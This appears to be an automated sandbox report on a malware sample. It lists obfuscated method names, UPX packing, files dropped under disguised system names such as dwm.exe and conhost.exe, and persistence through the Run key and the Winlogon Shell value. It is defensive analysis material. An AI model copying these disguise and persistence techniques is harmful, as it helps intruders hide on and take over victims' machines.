                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, WdhhMiuW4VmRkV8Mkr.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'oS21GGQHBTgF3Uo65qZ', 'S3j8jyQs7gpFqc9ovkV', 'q4KfjQQq5udi0GHKHWr', 'E1w0sTQFgWS1YxWMEOi', 'Hw1kBwQOAQXCX909SIV', 'md59a0QG8KaDtjDVxKL'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, l2ZjH1Mkm9r7H382WQF.csHigh entropy of concatenated method names: 'QZWM5RuOKi', 'HOWEfwqSZh9YIcPPFF6', 'McdOcbqkgG9quHrLQfe', 'irL52Xq8lwvSaFjU5G5', 'y43jcVqJt4sZJTcBWHV', 'fAWykwqAXD68HJOyF7f', 'SwFtPCqWDLJ5EKZLHSy', 'oYO5VVqXGjIGlRLXAAN', 'TOnK32qgXcpgJCeSC0l', 'f28'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, G0A6yji76rWcGVkgyZC.csHigh entropy of concatenated method names: 'GIrjfsrGeq', 'VV1VIXMkQOXmVxmVQya', 'T5i59rMAqn5KXfYBqDq', 'OWJKIdMJmrpurPqfH9g', 'GrwPidMSPtCar3O291U', 'oEQHshJQnT', 'ommH3n6jv6', 'vuEHa2eFUl', 'DOEHnCAyVs', 'Tk6HWdj09K'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Rs7c2QMtmHdCjvaU5qH.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'V3rcuhHleMCgr8b49EH', 'ha9bExHwiwIhnSSPWiW', 'ghXAexHZw8yea79MQ6b', 'YMvJKtHLsp45TpRw6Tu', 'pvBI9gHRQEObFpVX5cp', 'CqCNQlH0QRcKvXloPnL'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ch6kUeMyO3QpS8vk1yG.csHigh entropy of concatenated method names: 'CT1Ykf0lXY', 'AEcy7l9HIwLvMLbkbpc', 'dl60Hh9sol8TgcLJBCK', 'b5TGsw9dTkYYD3UETAF', 'zJ7g2R9QvGMAryPVXoM', 'YfVfSC9qLE8FFcQGVVL', '_5q7', 'YZ8', '_6kf', 'G9C'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, VRhgXeOoeXZcVJZTodF.csHigh entropy of concatenated method names: 'LhlJr4h0d8', 'WdtJL9sSGP', 'dCIJo7hGVN', 'lbNJxOmSqr', 'HRYJTkH0Dc', 'WZLp2JpBo2g9hfbxkDi', 'arXsmbpPRKbkhQVG9hy', 'LyBLccparYrSYXVwNWY', 'dZ6WScpzPgJta9We0yH', 'AOSmNm6rlFKjtSqv9kP'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Oa6EMxPdSTDocNCsUM.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'nyLQL6QUbr06wFMwcta', 'rqPTsEQ8NgPlr4hBaAM', 'BM1bLVQJAndAS11BSyq', 'l9eq6IQSQUBE3Iiddei', 'VcxoYiQkNOIqu7npK3G', 'nx3tV4QAvphSbyCRJPX'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, betIlB7WLuWXIPaw6yq.csHigh entropy of concatenated method names: 'VxKSKve9a4', 'RGWr32CBiMyHyvSP0d5', 'aNs0dqCY7LAYcbBZaAE', 'QXa72qC2sxD9UVhggtg', 'qLHODnCPI8GEtKK4rUu', 'qUbIYtCaf8WCd1ehLoG', 'fe056ECzGlSVSJuPIQJ'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, NwqPJqYDYkM1ERs7Xxb.csHigh entropy of concatenated method names: 'QqOtyY9NWH', 'l1IymdDIPsNT0IIiKEu', 'n5yMg9DdqfUXGLwZJLi', 'lyf1kLDybMBLwbgSjFS', 'AG9BZIDerMMERv0ZWj1', 'qUOCFmDQCIcki87kZgn', 'zmwkcJDHSkxnScDRXln', 'xUortDDsEtdCZu4YnKW', 'Efd62IDq8IyVAnmyQJF', 'uKZWe5DFCkKj8rwvnTY'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Fr5DGT35aFrNg2nIyc.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'aRK8hT7jd', 'R9jA1meAltFUuK7PeQx', 'UNjjnWeW57vgbL9P3oK', 'h54ngjeXZ2yCqK3McEq', 'mqBtHyegTZPidjFOO05', 'GD29DfetpdMtT7UFt6p'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Y90SN9MWtRGyKPAENfA.csHigh entropy of concatenated method names: 'kJWMGFHUtC', 'nxcO56OnrZxAE97vXAU', 'X66SRnOMiNxym2tS6TK', 'PgHYE9OtZ3sLgiPM5Kv', 'BTQGLtOvgLSwPctiQGB', 'LeMlgOOfBWqhVe7LuIU', 'QLw', 'YZ8', 'cC5', 'G9C'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, MapkL1OBJDSbyoMJ23G.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'zLl5C1UCZE', 'FUu5HdE9Sh', 'cS85pKMgBy', 'EC9', '_74a', '_8pl', '_27D', '_524'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, fwteF4OgxrX9u8hgJct.csHigh entropy of concatenated method names: 'BAWhC6Z4Tq', 'nObhHZINZN', 'tAKhpgmIaj', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'qJ8hjKKTIy'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, csnL8AtkWHZty2lLwdG.csHigh entropy of concatenated method names: 'QulCAFPvWX', 'ciYCetLuMV', 'UTCCftWPtO', 'YPrQ5kgVObo10HVpoew', 'hWivGGg67YKh3rDmcf2', 'qx3Z91gu8dT0SOJoAFE', 'bdVMYhgjKqBamku3x2V', 'IrNCOxIoBG', 'BOxCIjscdt', 'tJHCU3M5AB'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, eaDbAnOhoijUiQETvVw.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, BYeCgTtBsaeto0LIUYC.csHigh entropy of concatenated method names: '_5u9', 'tmyBxcWaUC', 'k5jHKuQA3S', 'ClOBtGT0aN', 'O3eqaGtB0Q2v6mCFsk1', 'e1qB6dtPthRruSkdNIY', 'hhnxBxtaGSZy07PNfp8', 'B5cSgptYhmDuIHE4JYS', 'zmwNkPt2vEvwtDyetVu', 'wSVBi7tz2LS6gTlfe5K'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, pPH30i7ZMw4bAaG5fCm.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'tJASTbmFsN', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ng42K6i2QkjsFRuNmB7.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'M1nDAcfW7K', 'Sg5DepXQHw', 'r8j', 'LS1', '_55S'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Ulqg1KYWqy9iK6x4JwQ.csHigh entropy of concatenated method names: 'wGl75qg1Kq', 'x7pygRJP53100MinFKZ', 'c5TLGTJaaKdBBCs8UWq', 'nR9e5JJ26nwiBbJANif', 'NSQjT0JBrkfrBl0lVIu', 'VRJCamJzstE0nnUn9yp', 'duAnJ1SroZxwvJu2AqB', 'YPnwbbSyiWO6yZiGDSH', 'RsrRHcSemP8Eo4CgIhv', 'b4jUBxSIYft4LCRh9jc'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, EndRHitDOP423G43614.csHigh entropy of concatenated method names: 'VqaU05tpdT', 'XOsUBrofYl', 'Ge4UFHUhNP', 'IwOUbXb8w0', 'OHhZyaXRsYtX9OZFoVf', 'hrN0vtX0EGJmaNysFsY', 'C3iUp6Xx1Ruxgwr7kXC', 'YlGqY6XZfqbJlyOcblu', 'fs4DpRXLaMb9Ger5VNL', 'SSTbrQXCdbMAaOggwDs'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, LhqPVHi9v7vwu6XZZwi.csHigh entropy of concatenated method names: '_7zt', 'euB4kGPnlG', 'CJM4r7LESg', 'Nys4LA5P2X', 'LCD4ogH5Pp', 'cmZ4x52Qb3', 'sKE4T6kFfK', 'sZWuKbftGLuiwZAX7NS', 'KnkUjufvVak6617x7fP', 'PZEPoFfX96tDcpX3Ttw'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, lKtJRR7wgcb3bJUNIqp.csHigh entropy of concatenated method names: 'BC10d2bQ8JfcjL7mFlZ', 'r2CQPJbHxLCaOw88P4j', 'KrZU7dbIDvYQXQ4MKuc', 'rZ8cnsbdJkFv50EGbJo', 'lhCPtHbswmYl6l4tocJ', 'YHLRPEbq3vi2mlS22HG', 'ENVpakbFjIP96fvx1aS'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, JrCZwsIvjVF3h1G2N1o.csHigh entropy of concatenated method names: 'JRlhlQEfZtL0kfq3ks4', 'VxRbgqEofIJuGUj3EeA', 'Ch1UogEn5lY4JBQIpsU', 'DXvgdtEMtmWMlBH5QWl', 'aX33DLiReU', 'YGScCNElar0CxxrSIKM', 'CrQyq2EwURx5BSylilt', 'iuwtpcEZSXeHXZsVXxo', 'C8nKyEELVGrViEgLSxv', 'u2Ydn7ERQoHkkHS0gpM'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, aPhSNltzEfrayTqNYZY.csHigh entropy of concatenated method names: 'chsHdZcl5k', 'ACSHgmqbKa', 'rYOH5uVaAn', 'kwfmudn6g7RdIJhktPi', 'gdto1Inu2DEw6rJwHwp', 'AgLTYLncHOkDdLrf9wD', 'hJbjAwnpN5831FXdfLT', 'uFfdWhnV332GvWmrcFk', 'rO7ekMnjUy9EByWjTEY', 'qg6RTPnEeyAc98e0JeG'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, apRwVaJ4qyLGtWjkUB.csHigh entropy of concatenated method names: 'x9SWLjbsr', 'i3mQlQr3g', 'NBHRKUg66', 'bemBHuybA9unQyr5IAj', 'VTwnUVyxb0uTCJsxREp', 'Pg1dWhyCY4Wee4lDwe8', 'RyWuZ7ycn2TPxbY532W', 'v4lnJmypR2YLKcaTW86', 'fdQ9dby6TcWlqERGPXr', 'TQoy0SyuCnYfN6XdsQc'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Xbb72oMSLQSvliDvtdr.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'jgJCBjq1yoRiEOA5JX7', 'PX0kVVqmKB5o4iik8Bq', 'SQJ6lDq54o94TRmogdi', 'AMvD5GqiRb0gLU7bFad', 'QOIMAWqT37kFhf9OJ6x', 'CHaMb1qNaZyCZtnkUrc'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, OHeT0RYc1rGnJTeSPch.csHigh entropy of concatenated method names: 'semISnwYBi', 'zVHM62ki3DH37I64dwx', 'hh46lqkmbk4q7sc6cy8', 'pHxT81k5p3OIqewOYJ9', 'z31oKNkTrc2MF2ETFRM', 'w3ZvDHkNwhPEvqfSS0U', 'xKfI9RMq7l', 'sxwIkAbMdo', 'tkFIryuIva', 'q7IILPZFiw'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, KA6iwBYgdQRABkH6nuj.csHigh entropy of concatenated method names: 'Ep1iNAtaxB', 'TWuicEQOrh', 'eZFizvZebm', 'O4t7KpAtIe', 'Lbu7MFvAIj', 'gIi7YkJj06', 'Oue7tnMHbs', 'vBA7iM0Tc9', 'h1l77n96fS', 'yB6LEI8YGjpFfM2eHbM'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ixCHqCiGdlf6DeJkUri.csHigh entropy of concatenated method names: 'VMVDNrOLqf', 'UsuDWo1mkK', 'PqhDQA7OZV', 'x73DR56Z8M', 'JxsDlXvPlr', 'OsMDwRJHNp', 'f4wD89e105', 'e5TD6PLiuV', 'h6NDVuCD4X', 's3WD0YMaNA'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, q5NYheMTUbFVpxGMSKh.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'Fxo4dAq0Adw8yofQZLP', 'wEnuTKqxKh0GPkkM0w7', 'bu5oYBqCnnDvGxbpb2e', 'grEdrwqbZdPblrqhfjy', 'fZxZUiqc9F3VQLG1oNL', 'D3CgmkqpG4qRS416Ubd'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, jujMeQihvXTOctv6lrD.csHigh entropy of concatenated method names: 'qRivnHpqGH', 'DmrvWLchQt', 'jZIvQitNQK', 'HcCvRxy93B', 'tFuvl7jgPZ', 'toBengoAKL24MhG5VP4', 'uVc4KGoSCosQ67leYxW', 'FNJVX9ok3ZJG3ysGtdh', 'WlGKhnoWigoV5LctHXf', 'J6oA2LoXIVTcTaF28dX'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ubVmFgIR5O6IktitNm.csHigh entropy of concatenated method names: 'MmFvgR5O6', 'i0F86kLKOPVBUNIIeU', 'KjoWBkwOWDAD3R9UcR', 'YlOmseZX47eELRPSmn', 'f4hV1dRy1SKRH7O3i1', 'ecyHwu0B8xJNgvuJLJ', 'Y9eY8xT1I', 'p6atmkswM', 'SsVigxMd9', 'zpv7P1rtR'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Up9XJDYCHy8FYkARRnc.csHigh entropy of concatenated method names: 'Fk6taMZvLV', 'tDbtnumkRv', 'Yu7tWTcroy', 'X3itQ2RBiW', 'dFItRBEXXm', 'SGFtljBFH5', 'rGstwU7trc', 'vuiqMDKnTNxoNnNU6bL', 'vVMEFoKts2gyHDNebIn', 'UYOeMDKvMZ8LesP0UqO'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, tfbb08OntcbpgMoW42X.csHigh entropy of concatenated method names: 'KAB76SVdnJV06FGD89X', 'k7iTtUVQyyie969f6x3', 'xt1ZCvVeanWvt7Z6g49', 'pBmqRrVIGTUK34vgAs6', 'FmGhWvjRtD', 'WM4', '_499', 'OAphQcJb14', 'pvBhRrkpi9', 'FCyhl1f8oB'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, lyPmma7EmUsrDZdGQja.csHigh entropy of concatenated method names: 'Wl6Si9b6d4', 'MCSS7XBGLM', 'yf7SOPTREI', 'OIgSIlcV6a', 'ukFSURaygh', 'IfMSC0uNLu', 'VsfSHZLRDd', 'aGNSp5RitA', 'rxmSjaZesO', 'wZeS4bY3M3'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, pBItIYtbvG59DjCaF5C.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'tvsBS5U92f', 'PT8Hi8xNbR', 'uuWB7vIWkO', 'Rna9EyvKjjT9dgLrLXA', 'kbkYuPvDsWU04d3T2VX', 'ymy7cHvUKo32lt7NFXm', 'o79vdNv8qlLEG3DTDaf', 'Rd5Z2HvJe19Slm3Sf1S'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, rsEoR5IpaXfYd7V1ncf.csHigh entropy of concatenated method names: 'sgxI4frrJ7MEM', 'VjtyP5EU1vYd2apoGXP', 'ENJjrJE8YyD0vR8OdBS', 'xf4Hw3EJhfQLDKhDOso', 'IuNmiaESSYRaWLdD0un', 'z6ui5EEk087YUEWHg79', 'G8R1IkEKt0dMj0KpglI', 'XkD9s7EDpTxbN2eGqtS', 'cVQoBFEAbV1uJsGVN6d', 'ripabKEWY2fcOsUc8xk'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, KY69gF7tTVVo0lQ0jib.csHigh entropy of concatenated method names: 'k4XRRPLtg2SWCZ9jkvn', 'WLUpWZLvIuWitiX6bFW', 'jXoADXLXWC45pvyHhOu', 'una680LgOcxlxBxKVxg', 'l1xrqlxGpR', 'NeXBS5Lf4aLReG7JQjX', 'Jo8kjsLoUZyUFLoDIIT', 'RKJVEqLnAi88iOUsMoY', 'W00AwvLM9QqgEWqBFQ4', 'LtP6QdL76OrpPhos0tK'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ubS7EcQT2nr842VYHD.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'ydsqMPePd8cc9nN7GDK', 'ag43waeahRNv1TxCfkH', 'rTd886ezEsb7rWUjPWd', 'Gb0JgKIrwKT1krvqHHg', 'hQmMHPIy2yMUTAbUAoR', 'S2MaTdIecBJeTE6XKdC'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, R7TcroM6yN3i2RBiWtF.csHigh entropy of concatenated method names: 'jqJYMGkLIk', 'KDYYYOnV0T', 'YeAYtM7THK', 'FduN8ROTvTmkSigjQAp', 'CIc6lqONqr09oWxBTni', 'LJXCiMO52ay2QBJ2QlH', 'VmjGYdOinPFvolpM77g', 'gQaqRIO35ag46owskBa', 'C04rxxOYjjxGwPpqMU5', 'SiSHFHO2vgTS9rZt3fZ'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, jdJ2xFiqY3A1Z2a7rrs.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'tfbvKb08tc', '_3il', 'PpgvMMoW42', 'PG3vY7P7mM', '_78N', 'z3K'
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeJump to dropped file
                        Source: unknownExecutable created and started: C:\Windows\SysWOW64\it-IT\dasHost.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_ctypes.pydJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Program Files (x86)\jDownloader\iKSiRODBDWoPAMSDKBDQBFN.exeJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\SysWOW64\it-IT\dasHost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pydJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\python311.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeFile created: C:\Users\user\AppData\Local\Temp\XClient.exeJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\addins\cmd.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeFile created: C:\Users\user\AppData\Local\Temp\svchosts.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pydJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\libcrypto-1_1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\libffi-8.dllJump to dropped file
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeFile created: C:\Users\user\AppData\Local\Temp\S l r .exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\libssl-1_1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_decimal.pydJump to dropped file
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeFile created: C:\Users\user\AppData\Local\Temp\Built.exeJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Recovery\powershell.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeFile created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pydJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\iKSiRODBDWoPAMSDKBDQBFN.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\rar.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\sqlite3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeFile created: C:\Brokercrt\comReviewsession.exeJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\apppatch\en-US\conhost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pydJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\SysWOW64\it-IT\dasHost.exeJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\addins\cmd.exeJump to dropped file
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\apppatch\en-US\conhost.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Brokercrt\comReviewsession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
